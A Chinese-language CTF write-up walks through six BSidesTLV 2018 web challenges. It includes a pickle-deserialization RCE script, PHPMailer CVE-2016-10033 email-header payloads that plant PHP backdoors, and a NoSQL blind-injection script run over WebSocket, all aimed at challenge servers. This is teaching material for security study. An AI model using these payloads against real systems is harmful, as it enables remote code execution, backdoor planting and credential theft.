BSidesTLV 2018 CTF 题目解析与教学文档<\/h1>

0x01 比赛环境搭建<\/h2>

比赛环境下载链接：
magnet:?xt=urn:btih:849BC74CE4939E40D244F899D693F55AFB1D2FE7<\/p>

环境信息：<\/p>

格式：Virtual Machine (Virtualbox - OVA)<\/li>
系统：Linux<\/li>
CTFD用户账户：user:user<\/li>
CTFD Admin账户：bsidestlv:bsidestlv<\/li>

Boot2Docker SSH：docker:tcuser<\/li> <\/ul>

0x02 题目详细解析<\/h2>

1. Redirect me<\/h3>

题目地址<\/strong>：http:\/\/challenges.bsidestlv.com:8081<\/p>

解题步骤<\/strong>：<\/p>

访问页面发现不断重定向<\/li>
观察重定向路径（如18.html）<\/li>
手动修改URL尝试后续数字（37.html, 40.html等）<\/li>
在40.html的响应内容中找到flag<\/li> <\/ol>
技术要点<\/strong>：<\/p>

HTTP重定向跟踪<\/li>
手动URL枚举<\/li> <\/ul>
2. IH8emacs<\/h3>
题目地址<\/strong>：http:\/\/challenges.bsidestlv.com:8443<\/p>
解题步骤<\/strong>：<\/p>

识别题目提示与Emacs备份文件相关<\/li>
尝试访问index.php~（Emacs备份文件）<\/li>
在备份文件中发现被注释的管理界面地址\/administration\/<\/li>
寻找.htaccess~和.htpasswd~文件<\/li>
在.htpasswd~中找到登录凭证<\/li>
使用John the Ripper破解hash<\/li>
使用破解后的凭证(bsidestlv:performa)登录获取flag<\/li> <\/ol>
技术要点<\/strong>：<\/p>

Emacs备份文件识别(~后缀)<\/li>
.htpasswd文件利用<\/li>
密码hash破解<\/li> <\/ul>
3. Creative Agency<\/h3>
题目地址<\/strong>：http:\/\/challenges.bsidestlv.com:3333<\/p>
解题步骤<\/strong>：<\/p>

题目描述给出flag绝对路径：\/home\/bsidestlv\/flag.txt<\/li>
发现网站图片加载路径被反转（如ƃƃdɾ˙1punoɹɹƃƃʞʞɔɐɐq\/ƃƃɯɯı\/˙对应.\/img\/background1.jpg）<\/li>
构造反转路径读取flag.txt：

原始路径：\/home\/bsidestlv\/flag.txt<\/li>
反转后：ʇʇxʇʇ˙ƃƃɐɐʃɟɟ\/ʌʃʇʇsǝǝpısq\/ǝǝɯɯoɥɥ\/˙˙<\/li> <\/ul> <\/li>
通过\/img?file=参数访问反转路径获取flag<\/li> <\/ol>
技术要点<\/strong>：<\/p>

任意文件读取漏洞<\/li>
路径反转技巧<\/li>
编码转换<\/li> <\/ul>
4. I'm Pickle Rick!<\/h3>
题目地址<\/strong>：http:\/\/challenges.bsidestlv.com:8088<\/p>
解题步骤<\/strong>：<\/p>

分析页面源代码中的JavaScript逻辑<\/li>
理解网站工作流程：

视频播放结束后调用pickleRick()<\/li>
pickleRick()调用anatomyParkMembers("morty")<\/li>
发送请求到\/getMembers.html?visitor=morty<\/li>
返回base64编码的压缩数据<\/li>
调用statusAnatomyParkMembers()处理数据<\/li> <\/ul> <\/li>
发现数据使用gzip\/deflate压缩<\/li>
构造恶意压缩数据实现RCE：
import<\/span> zlib <\/span><\/span>import<\/span> requests <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>def<\/span> create_command<\/span>(cmd, args, flags): <\/span><\/span> mould =<\/span> """csubprocesscheck_output(((S'<\/span>{0}<\/span>'S'<\/span>{1}<\/span>'S'<\/span>{2}<\/span>'ltR."""<\/span> <\/span><\/span> return<\/span> base64.<\/span>b64encode(zlib.<\/span>compress(mould.<\/span>format(cmd, args, flags), 9<\/span>)) <\/span><\/span> <\/span><\/span>targeturl =<\/span> 'http:\/\/challenges.bsidestlv.com:8088\/statusMembers.html?data=<\/span>{0}<\/span>&format=json'<\/span> <\/span><\/span>r =<\/span> requests.<\/span>get(targeturl.<\/span>format(create_command('cat'<\/span>, '..\/flag.txt'<\/span>, '-A'<\/span>))) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 技术要点<\/strong>：<\/p> WebSocket协议分析<\/li> 数据压缩利用<\/li> 远程代码执行<\/li> <\/ul> 5. ContactUs<\/h3> 题目地址<\/strong>：http:\/\/challenges.bsidestlv.com:8080<\/p> 解题步骤<\/strong>：<\/p> 识别为PHPMailer漏洞(CVE-2016-10033)<\/li> 构造恶意邮件发送表单： Name: zusheng Email: "zusheng\" -oQ\/tmp\/ -X\/var\/www\/cache\/phpcode.php is"@qq.com Message: <?php phpinfo(); ?> <\/code><\/pre> <\/li> 根据返回提示调整后门位置： Name: zusheng Email: "zusheng\" -oQ\/tmp\/ -X\/var\/www\/html\/cache\/d246b1e461bf.php is"@qq.com Message: <?php echo exec('cat $(find \/ -name flag.txt)'); ?> <\/code><\/pre> <\/li> 访问生成的PHP后门文件获取flag<\/li> <\/ol> 技术要点<\/strong>：<\/p> PHPMailer漏洞利用<\/li> 邮件头注入<\/li> 后门文件写入<\/li> <\/ul> 6. NoSocket<\/h3> 题目地址<\/strong>：http:\/\/challenges.bsidestlv.com:8030\/login<\/p> 解题步骤<\/strong>：<\/p> 分析页面JavaScript代码<\/li> 发现WebSocket连接(ws:\/\/challenges.bsidestlv.com:8000\/login)<\/li> 识别验证逻辑存在NoSQL注入漏洞<\/li> 使用盲注技术逐字符获取密码： import<\/span> string <\/span><\/span>from<\/span> websocket import<\/span> create_connection <\/span><\/span> <\/span><\/span>def<\/span> datachar<\/span>(i): <\/span><\/span> for<\/span> char in<\/span> string.<\/span>printable: <\/span><\/span> password =<\/span> "' || this.password[<\/span>%d<\/span>] == '<\/span>%s<\/span>"<\/span> %<\/span> (i, char) <\/span><\/span> data =<\/span> "{<\/span>\"<\/span>username<\/span>\"<\/span>:<\/span>\"<\/span>admin<\/span>\"<\/span>, <\/span>\"<\/span>password<\/span>\"<\/span>: <\/span>\"<\/span>%s<\/span>\"<\/span>}"<\/span> %<\/span> password <\/span><\/span> ws.<\/span>send(data) <\/span><\/span> response =<\/span> ws.<\/span>recv() <\/span><\/span> if<\/span> "Success!"<\/span> in<\/span> response: <\/span><\/span> return<\/span> char <\/span><\/span> <\/span><\/span>ws =<\/span> create_connection("ws:\/\/challenges.bsidestlv.com:8000\/login"<\/span>) <\/span><\/span>response =<\/span> ""<\/span> <\/span><\/span>for<\/span> i in<\/span> range(10<\/span>, 30<\/span>): <\/span><\/span> if<\/span> datachar(i) is<\/span> None<\/span>: <\/span><\/span> break<\/span> <\/span><\/span> response +=<\/span> datachar(i) <\/span><\/span> print response <\/span><\/span>print 'Flag: BSidesTLV{'<\/span> +<\/span> response <\/span><\/span>ws.<\/span>close() <\/span><\/span><\/code><\/pre><\/li> <\/ol> 技术要点<\/strong>：<\/p> WebSocket协议<\/li> NoSQL注入<\/li> 盲注技术<\/li> <\/ul> 0x03 总结与学习要点<\/h2> 信息收集技巧<\/strong>：<\/p> 备份文件(.bak, ~)<\/li> 配置文件(.htaccess, .htpasswd)<\/li> 源码注释信息<\/li> <\/ul> <\/li> 漏洞利用技术<\/strong>：<\/p> 路径遍历\/任意文件读取<\/li> 已知漏洞利用(PHPMailer)<\/li> NoSQL注入<\/li> WebSocket协议分析<\/li> <\/ul> <\/li> 编码与转换<\/strong>：<\/p> Base64编码<\/li> Gzip\/deflate压缩<\/li> 字符串反转技巧<\/li> <\/ul> <\/li> 自动化工具使用<\/strong>：<\/p> John the Ripper密码破解<\/li> Python脚本编写(requests, websocket库)<\/li> <\/ul> <\/li> CTF常见技巧<\/strong>：<\/p> 盲注技术<\/li> 远程代码执行<\/li> 后门文件写入<\/li> <\/ul> <\/li> <\/ol> 通过分析这些题目，可以全面了解Web安全中的多种攻击技术和防御方法，建议在实际环境中复现这些题目以加深理解。<\/p>